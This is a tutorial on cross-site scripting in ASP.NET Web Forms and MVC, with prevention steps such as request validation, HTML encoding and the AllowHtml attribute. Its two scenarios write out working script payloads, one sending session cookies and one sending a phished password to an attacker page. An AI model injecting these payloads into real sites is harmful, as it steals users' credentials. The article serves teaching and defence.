XSS attack exploits vulnerabilities in Web page validation by injecting client-side script code. Online you can find many examples related to this kind of attack but in this article I am going to show you a few real time examples.
XSS Attack Examples with real time scenarios
We know that hackers can inject their script files through victim’s browser (like in input fields). Let's see a few scenarios as below:
Scenario #1
Using a cookie a hacker can hack a victim’s username and password and save their credentials in his/her database.
Here we have a victim’s page like this,
![code]()
And the code behind file as below,
![code]()
Now the hacker can inject the below highlighted script into the input control of the web page.
<script>window.open('http://localhost:62887/XSS/AttackerPage.aspx?cookie='+document.cookie,'_blank')</script>
Screenshot
![login]()
We enter the above script in any one of the input controls of the web page and after submitting the web form whatever we entered in the input textboxes will go to the hacker’s database. Please refer to the below screenshots for reference.
Screenshot #1
![login]()
Screenshot #2
![login]()
When we refresh the browser the credential will be saved in victim’s database
Screenshot #1
![login]()
Screenshot #2
![cookies]()
And by using those credentials the hacker can do anything that he/she wants to do with the victim’s database.
Scenario #2
Using a prompt box, asking for a password verification and once the end user enters the password then the entered password will be saved in hacker's database.
Once the hacker enters the below script in one of the input control of the web page then after submitting the form the entered script will be saved in the database. If you observe the below script, the hacker prepared a script with his/her web page address in "window.open" box.
- <script>
- varpwd = prompt("please verify your password for security reason", "");
- if (pwd != null)
- {
- window.open('http://localhost:62887/XSS/AttackerPage.aspx?password=' + pwd, '_blank');
- }
- </script>
![Web page]()
After clicking on submit button,
![Web page]()
![comment]()
After refreshing the browser the end user will get a prompt box like as below,
![prompt]()
After giving password in this prompt box and clicking on Ok button then the entered password will be saved in hacker’s database as like below,
![prompt]()
After clicking on Ok button,
![button]()
![id]()
The attacker's web page code behind file as below,
AttackerPage.aspx.cs ![code]()
Prevention mechanism Prevention mechanism when we work with Web forms application:
Attackers can attack in various ways and we have to prevent our web application from all kind of attack scenarios. The possible prevention ways for XSS attack are as following,
Step 1: Check that ASP.NET request validation is enabled.
Step 2: Verify ASP.NET code that generates HTML output.
Step 3: Find out whether HTML output includes input parameters.
Step 4: Check potentially dangerous HTML attributes and tags.
Step 5: Find out countermeasures.
By default, request validation is enabled in Machine.config.
If we set ValidateRequest="true"or remove the ValidateRequest page attribute and browse to the page again then the following error message will be displayed.
As we know theValidateRequest page attribute by default is true for a web form, so when the hacker enters any malicious XSS script (for instance "<script>alert ('hello...") thenRequest.Form detects this kind of injection and rejects the input because the input includes potentially dangerous HTML characters.
For example
![code]()
Output ![Output]()
Encode HTML Tags Encode the string input using HtmlEncode method. Use a StringBuilder and call the Replace method to selectively remove the encoding on the HTML elements that you want to permit. Sample code with screenshot as below:
![code]()
Or you can write a Regular Expression to replace HTML tags by replacing its encode character. Sample code as below,
![code]()
Whatever we applied at client side is not enough because we can’t trust client side code, so we have to handle code behind file as well. Sample code as below,
![code]()
Use of AllowHtml Attribute in MVC Sometimes we have a requirement to save HTML data in the database and our application in built in MVC rather than ASP.NET Web forms application. By default ASP.NET MVC does not allow a user to submit HTML tags for avoiding Cross-Site Scripting attack to our application. I have a MVC application and my page is as below,
![Sometimes we have requirement to save HTML data in the database and our application in build in MVC rather than ASP.NET Web forms application. By default ASP.NET MVC does not allow a user to submit HTML tags for avoiding Cross-Site Scriptingattack to our application. I have a MVC application and my page like as below:]()
Now I am inputting an HTML tag to Content field and this will be like,
![Content field]()
After clicking CREATE button the page will be like this,
![error]()
So to overcome this type of error in MVC applications we have to use “AllowHtml” attribute in our model class. Now I am applying this attribute to my Content field that is present in AllowHtmlModel class like this,
![code]()
If we write like this in model class then any HTML tag we can input in our MVC application will allow HTML tags to that field to which AllowHtml attribute is applied in model class, but no to other fields.